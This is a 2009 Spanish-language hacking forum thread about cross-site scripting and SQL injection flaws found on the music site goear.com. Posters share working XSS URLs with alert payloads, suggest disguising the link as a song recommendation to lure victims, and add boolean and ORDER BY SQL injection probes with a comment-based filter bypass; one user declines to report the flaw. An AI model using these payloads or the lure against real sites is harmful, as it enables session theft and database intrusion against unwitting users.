xss en goear.com

jdc · 8 Noviembre 2009, 20:49 PM

Por lo general no posteo xss pero este en particular me parece que es especialmente grave por la ingenieria social que se le puede aplicar, ya que es en un sitio de musica online y es facil decir "Oh mira que cancion tan buena" :¬¬

Esta reportado 11/08/2009

El xss esta en la pagina donde se abre el reproductor portable...

Yo lo llamaria inyeccion html :¬¬ pero para que WHK no reclame lo llamaremos xss xD

por ejemplo tenemos una cancion cualquiera:

http://www.goear.com/listenwin.php?v=78707c5

le agregamos nuestro codigo malo xD

http://www.goear.com/listenwin.php?v=78707c5'><script>alert('te robamos tus cookies... gracias

')</script>

Que en el navegador se vera:

http://www.goear.com/listenwin.php?v=78707c5'%3E%3Cscript%3Ealert('te%20robamos%20tus%20cookies...%20gracias%20;)')%3C/script%3E

y que podemos disfrazar en foros asi

http://www.goear.com/listenwin.php?v=78707c5 y decir "esta cancion es genial"

No se cargara la cancion pero la gente no dudara a menos que vea la direccion xD en fin

Saludos.

PD: Solo se le agrego un alert pero la gente puede ser un poco mas ingeniosa, si no quieren que la direccion aparezca como http://www.goear.com/listenwin.php?v=78707c5'> solo quitenlo, se ejecuta igual nuestra inyec... XSS ¬¬

Castg! · 8 Noviembre 2009, 22:21 PM

estaba buscando vulenrabilidad a goear cuando me vengoa l foro y ya postearon! xd!

WHK · 8 Noviembre 2009, 22:45 PM

genial!, lo agregaré al recopilarorio de advisories:
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_301009-t244090.0.html

jdc · 9 Noviembre 2009, 01:58 AM

Ok gracias

complemente la informacion en el post de SDC que no recordaba xD

http://foro.elhacker.net/nivel_web/recopilatorio_de_vulnerabilidades_de_xsssqlinjection-t220843.0.html;msg1343265#msg1343265

Ahi aclare que la vulnerabilidad no ha sido reparada y puse los datos que se piden

**********
EDITO:
**********

El buscador de goear tambien tiene xss, solo hay que escapar con "> por ejemplo si buscas

Código [Seleccionar]

green day"><script>alert('janito24')</script>

Lo que te llevaria a:

Código [Seleccionar]

http://www.goear.com/search.php?q=green+day%22%3E%3Cscript%3Ealert%28%27janito24%27%29%3C%2Fscript%3E

YST · 9 Noviembre 2009, 02:17 AM

Agregale un SQLI

Código (VB) [Seleccionar]


http://www.goear.com/listenwin.php?v=78707c5'+and+1=1+--+
http://www.goear.com/listenwin.php?v=78707c5'+and+1=2+--+

fede_cp · 9 Noviembre 2009, 04:37 AM

a ver si podemos sacar algo de aca, nose si servira de algo:

http://www.goear.com/listenwin.php?v=%22%3E1+/**/ordEr+/**/++By+10--

adios

YST · 9 Noviembre 2009, 05:30 AM

No se para que tanto desordern en el order tan solo con el /**/ te saltas el filtro

Lo malo es que el Select te lo jode

jdc · 9 Noviembre 2009, 06:46 AM

YST sería bueno que reportaras la sqli

Saludos y felicidades

YST · 9 Noviembre 2009, 06:55 AM

Cita de: janito24 en 9 Noviembre 2009, 06:46 AM
YST sería bueno que reportaras la sqli

Yo no reporto nada

Si alguien quiere reportarlo es libre

fede_cp · 9 Noviembre 2009, 22:15 PM

en goear hay un bug, realemente importante, si quieren le publico y si no se puede por mp se los dire

saludos